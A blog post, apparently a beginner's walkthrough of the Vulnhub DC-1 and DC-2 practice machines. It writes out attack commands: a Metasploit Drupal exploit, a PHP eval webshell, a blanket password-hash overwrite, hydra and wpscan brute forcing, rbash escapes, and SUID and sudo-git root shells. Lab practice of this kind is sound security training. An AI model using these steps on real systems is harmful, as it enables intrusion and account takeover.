vulnhub渗透记录1(DC-1&DC-2)

本文记录了在Vulnhub平台进行的DC-1和DC-2渗透测试过程。在DC-1中,通过信息收集发现目标运行Drupal7 CMS,利用AWVS找到任意命令执行漏洞,成功获取shell并提权。在DC-2中,识别出WordPress 4.7.10并进行扫描,利用wpscan找到用户,通过hydra进行爆破,最终绕过rbash限制提权并找到flag。
摘要由CSDN通过智能技术生成

DC-1

环境搭建

装好靶机,连接nat模式,这样就已经打开了
kali也连接的nat模式
在这里插入图片描述
首先查看本地ip地址:192.168.159.131
在这里插入图片描述

信息收集

内网扫描:arp-scan -l
在这里插入图片描述
也可以nmap -sP 192.168.159.0/24
在这里插入图片描述
找到目标:192.168.159.132
比较喜欢在windows操作,扫一波端口先
开放了80端口,web服务器
在这里插入图片描述
先扫一下目录
kali里面dirb 192.168.159.132
在这里插入图片描述
访问一下robots.txt
在这里插入图片描述

看到指纹,有一个CMS:Drupal7,看下有没有能利用的漏洞
在这里插入图片描述
AWVS扫一波
在这里插入图片描述
扫到了一个任意命令执行,试着用msf打一波

msfconsole -q
search drupal
use 4

在这里插入图片描述
use 4 后设置靶机的IP就可以执行exploit

set rhosts 192.168.159.132
exploit

在这里插入图片描述
看到了session信息后,我们反弹一个交互的shell\

shell
python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述
我们写一个马进去玩一下

echo '<?php eval($_POST[1]);?>'>1.php

在这里插入图片描述
连蚁剑打方便一点
这里有消息,找配置文件,进一步扩大漏洞利用
在这里插入图片描述
在/var/www/sites/default/settings.php找到配置信息
在这里插入图片描述
登陆一波数据库

mysql -u dbuser -p
R0ck3t

成功进入
在这里插入图片描述
查表,发现有node和role,这两个表很重要

在这里插入图片描述
查询一波
出现了flag3,且有flag3的记录uid都为1
在这里插入图片描述
uid为1的用户是不受Drupal权限管制的,具有最高权限
我们来提权一波,有两个办法:

  1. 重置管理员密码
  2. 添加新的管理员账户

查询一下users表,搞出admin的号
在这里插入图片描述
但是这个东西加密了,我们可以更新掉他的表,那我们要怎么去加密我们更新的密码勒

找到scripts脚本
在这里插入图片描述

./scripts/password-hash.sh 123

在这里插入图片描述

加密后密码

$S$DVWvJapJiB/YzoQ9C6vt2ZV.5vTS3A68L35AxvMz23Zr47RQHiVs

更新记录
全部密码换成123

update users set pass="$S$DVWvJapJiB/YzoQ9C6vt2ZV.5vTS3A68L35AxvMz23Zr47RQHiVs";

成功登陆admin的账号
在这里插入图片描述
找到flag3
在这里插入图片描述
下一步,我们去找passwd看看,看到就想到了/etc/passwd
在这里插入图片描述
找到flag4
在这里插入图片描述
要去root找flag,但是没有权限,那我们就要提权
查找具有root权限的文件

find / -user root -perm -4000 -print 2>/dev/null

在这里插入图片描述

/user/bin/find /root

在这里插入图片描述

find ./ aaa -exec '/bin/sh' \;

成功提权
在这里插入图片描述

在这里插入图片描述

总结

  • 第一次做vulnhub,感觉很不错,很有真实渗透的感觉,信息收集,poc利用之类的
  • 第一次用msf打poc,修好了坏了很久的AWVS,里面还是比较多漏洞库的
  • 第一次尝试提权

DC-2

信息收集

装好了后,设nat模式

nmap扫出目标的ip:nmap -sP 192.168.159.0/24

扫出:192.168.159.133

扫描端口,开了一个80端口
在这里插入图片描述
还有一个7744端口
在这里插入图片描述

80端口直接还打不开,查了一下文章,可能是本地不解析他的ip
在这里插入图片描述
修改hosts文件
在这里插入图片描述
成功访问,这里看到了wordpress
在这里插入图片描述
看看指纹,有wordpress的CMS,是4.7.10的
在这里插入图片描述
还是上AWVS扫一下有什么洞
可能有wordpress的洞,待会再看
在这里插入图片描述

边扫我们边看下有啥信息
有个flag,提示用到cewl工具
在这里插入图片描述
cewl工具是kali的一个字典生成工具,用法参考

cewl -v http://dc-2/ 

在这里插入图片描述
既然用的wordpress,那我们用wpsan来扫漏洞,用法详情参考

命令1:root@kali:~# wpscan --url http://dc-2 --enumerate u
#暴力枚举用户名(这个是资料里面的,我的卡里里面跑不了这个的!!!)

命令2:wpscan --ignore-main-redirect --url 192.168.85.137 --enumerate u --force
#这是自己花两个星期终于找到解决问题的办法了

扫到三个用户名:admin,jerry,tom
在这里插入图片描述
然后利用这三个用户名和之前收集的密码进行爆破尝试

hydra工具的使用
hydra -L dc-2_user.txt -P dc2_passwords.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’

-l ——> 表示单个用户名(使用-L表示用户名列表)
-P ——> 表示使用以下密码列表
http-post-form ——> 表示表单的类型
/ dvwa / login-php ——> 是登录页面URL
username ——> 是输入用户名的表单字段
^ USER ^ ——> 告诉Hydra使用字段中的用户名或列表
password是输入密码的表单字段(可以是passwd,pass等)
^ PASS ^ ——> 告诉Hydra使用提供的密码列表
可以使用wpscan来爆破

wpscan -u 192.168.64.138 -e u --wordlist /root/wordlist.txt

命令详解:
-e枚举方式
u 用户ID1-ID10
–wordlist使用指定字典进行密码爆破 /root/wordlist.txt 字典路径及字典文件
wordlist.txt字典文件需自己准备或使用kali自带字典

我用bp来爆破
在这里插入图片描述
成功爆破到两个
在这里插入图片描述
tom:parturient
jerry:adipiscing

登进后台系统,好像没啥,看看能不能登ssh服务,之前扫了一个7744端口

成功登进去了
在这里插入图片描述
来说看看这个flag3的,但是命令执行失败了
在这里插入图片描述

rbash的绕过

rbash,对命令有限制
绕过参考

编辑器绕过rbash

  • vi编辑器
    在命令行中,输入 vi,在末行模式中,输入 :set shell=/bin/bash
    这里就直接将shell设置为/bin/bash
    接着在执行命令 shell就好了:shell,就有一个无限制的shell了
    在这里插入图片描述
    在这里插入图片描述
  • ed编辑器
ed
!'/bin/sh'

小技巧,按tab可以查看可使用的命令
在这里插入图片描述
执行cat,报错了
在这里插入图片描述
原来是还没弄完
接下来还要添加环境变量

export PATH=$PATH:/bin/
或者
export PATH=/usr/sbin:/usr/bin:/sbin:/bin

成功绕过
在这里插入图片描述
切换用户到jerry:su jerry
在/home/jerry这里找到了flag4
在这里插入图片描述
读取一波
在这里插入图片描述
提示git,使用git提权

使用sudo -l不需要密码
git提权

sudo git -p help
末行输入:!/bin/bash

成功提权
在这里插入图片描述
找到final flag
在这里插入图片描述

总结

  • 第二次vulnhub,学到挺多的,这次渗透的是一个wordpress
  • cewl工具的使用,这是kali自带的密码生成工具
  • wordpress搭建的,用wpsan来扫漏洞,进行账号密码的爆破之类的
  • rbash的绕过,先用编辑器,再搞环境变量
  • 又是一个提权,sudo -l执行不需要输入密码的话就可以使用git提权
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值